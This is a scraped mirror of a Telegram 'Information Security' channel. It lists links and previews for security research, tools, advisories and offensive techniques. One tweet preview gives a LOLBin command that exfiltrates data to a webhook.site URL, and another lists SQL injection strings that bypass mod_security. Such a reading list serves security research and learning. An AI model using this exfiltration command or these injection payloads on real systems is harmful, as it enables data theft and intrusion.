Telegram Web Link
bootg.com
»
United States
»
Information Security
» Telegram Web
Information Security
https://www.hackerone.com/blog/Top-Firewall-Misconfigurations-that-Lead-to-Easy-Exploitations
HackerOne
Top Firewall Misconfigurations that Lead to Easy Exploitations by Attackers
Migrating to the cloud means sharing responsibility for security with the cloud provider. Read about one important part of the shared responsibility model: keeping your cloud network secure. Discover how to protect your cloud networks from attackers.
Information Security
https://github.com/GoSecure/dtd-finder/blob/698fd678f26395e1c7c097525f7182aecad0cd5f/list/xxe_payloads.md
GitHub
dtd-finder/list/xxe_payloads.md at 698fd678f26395e1c7c097525f7182aecad0cd5f · GoSecure/dtd-finder
List DTDs and generate XXE payloads using those local DTDs. - GoSecure/dtd-finder
Information Security
https://twitter.com/juwilie1337/status/1301099882304942086
Twitter
juwilie
If you want your own Burp Collaborator, but with more protocols and web panel here it is https://t.co/jUZj6VWAy7
Information Security
https://lab.wallarm.com/340-weak-jwt-secrets-you-should-check-in-your-code/
Wallarm
☝️
340 weak JWT secrets you should check in your code
340 weak JWT secrets you should check in your code. Don't leave your web app's authentication exposed to hackers. Review this list
Information Security
https://prookl.dev/uncategorized/writing-a-burp-extension/
Prookl
Writing A Burp Extension, Prookl
I recently took a Black Hat course by MDSec called
Information Security
https://github.com/summitt/Burp-Non-HTTP-Extension
GitHub
GitHub - summitt/Nope-Proxy: TCP/UDP Non-HTTP Proxy Extension (NoPE) for Burp Suite.
TCP/UDP Non-HTTP Proxy Extension (NoPE) for Burp Suite. - summitt/Nope-Proxy
Information Security
https://securitylab.github.com/advisories/GHSL-2020-027-netflix-conductor
GitHub Security Lab
GHSL-2020-027: Server-Side Template Injection in Netflix Conductor
A Server-Side Template Injection was identified in Netflix Conductor enabling attackers to inject arbitrary Java EL expressions, leading to a pre-auth Remote Code Execution (RCE) vulnerability.
Information Security
https://x64sec.sh/custom-dll-injection-with-cobalt-strike/
Information Security
https://github.com/Nalen98/AngryGhidra
GitHub
GitHub - Nalen98/AngryGhidra: Use angr in Ghidra
Use angr in Ghidra. Contribute to Nalen98/AngryGhidra development by creating an account on GitHub.
Information Security
https://hardik05.wordpress.com/2020/09/05/fuzzing-with-hongfuzz-fuzzing-a-simple-c-program/
Hardik05's Blog
[Fuzzing with hongfuzz] Fuzzing a simple C program
Video post by @hardik05.
Information Security
https://github.com/b1ack0wl/linux_mint_poc
GitHub
GitHub - b1ack0wl/linux_mint_poc
Contribute to b1ack0wl/linux_mint_poc development by creating an account on GitHub.
Information Security
https://github.com/rdoix/Buffer-Overflow-Cheat-Sheet
GitHub
GitHub - rdoix/Buffer-Overflow-Cheat-Sheet
Contribute to rdoix/Buffer-Overflow-Cheat-Sheet development by creating an account on GitHub.
Information Security
https://research.securitum.com/prototype-pollution-and-bypassing-client-side-html-sanitizers/
research.securitum.com
Prototype pollution - and bypassing client-side HTML sanitizers - research.securitum.com
In this article I’ll cover the prototype pollution vulnerability and show it can be used to bypass client-side HTML sanitizers. I’m also considering various ways to find exploitation of prototype pollution via semi-automatic methods. It could also be a big…
Information Security
https://googleprojectzero.blogspot.com/2020/09/attacking-qualcomm-adreno-gpu.html?m=1
Blogspot
Attacking the Qualcomm Adreno GPU
Posted by Ben Hawkes, Project Zero When writing an Android exploit, breaking out of the application sandbox is often a key step. There are a...
Information Security
https://twitter.com/NtSetDefault/status/1303643299509567488
Twitter
NtRaiseException()
Another way to use #LOLBins for data exfiltration "C:\Program Files (x86)\Microsoft SDKs\Windows\v7.0A\bin\wsdl.exe" /server https[:]//webhook.site/xxxxx-xxxx-xxxxxx?sensitive_data
🚧
UserAgent: Mozilla/4.0 (compatible; MSIE 6.0; MS Web Services Client Protocol…
Information Security
https://0xdf.gitlab.io/2020/09/08/roguepotato-on-remote.html
0xdf hacks stuff
RoguePotato on Remote
JuicyPotato was a go-to exploit whenever I found myself with a Windows shell with SeImpersonatePrivilege, which typically was whenever there was some kind of webserver exploit. But Microsoft changed things in Server 2019 to brake JuicyPotato, so I was really…
Information Security
https://docs.google.com/document/d/120J4YG5FoycAsOhMe0SRYt_8sgEYY8A23tQBRwR5zSU/edit
Google Docs
DmEnrollment Service - MDMdiagnostics
DmEnrollment Service - MDMdiagnostics Insecure registry export - Escalation of Privilege The DmEnrollemnt service provides functionality that exports various data relevant for adminstration of computers managed by central authorities as schools or workplaces.…
Information Security
https://twitter.com/_Y000_/status/1303092547959615491?s=20
Twitter
alert(Y000!)
sql injection mod_security bypass usando distinct -1' union+select+1+--+
✖️
-1' union+distinct+select+1+--+
✖️
-1' and union+distinct+select+1+--+
✖️
-1' and .0union+distinct+select+1+--+
✅
un bypass no siempre es complicado #bypass #sql #CyberSecurity #payloads
Information Security
https://s3cur3th1ssh1t.github.io/Bypass-AMSI-by-manual-modification-part-II/
s3cur3th1ssh1t.github.io
Bypass AMSI by manual modification part II - Invoke-Mimikatz | S3cur3Th1sSh1t
This blog post will cover some lets say more advanced AMSI triggers. I decided to build a custom Invoke-Mimikatz script without AMSI trigger. I will also cov...
Information Security
https://srcincite.io/advisories/src-2020-0019/
2024/11/20 04:18:30
Back to Top
HTML Embed Code:
TW
HK
DE
US
CA
RU
NO
CN
UA
SG
YE
IN
SA
FR
IQ
UK
EG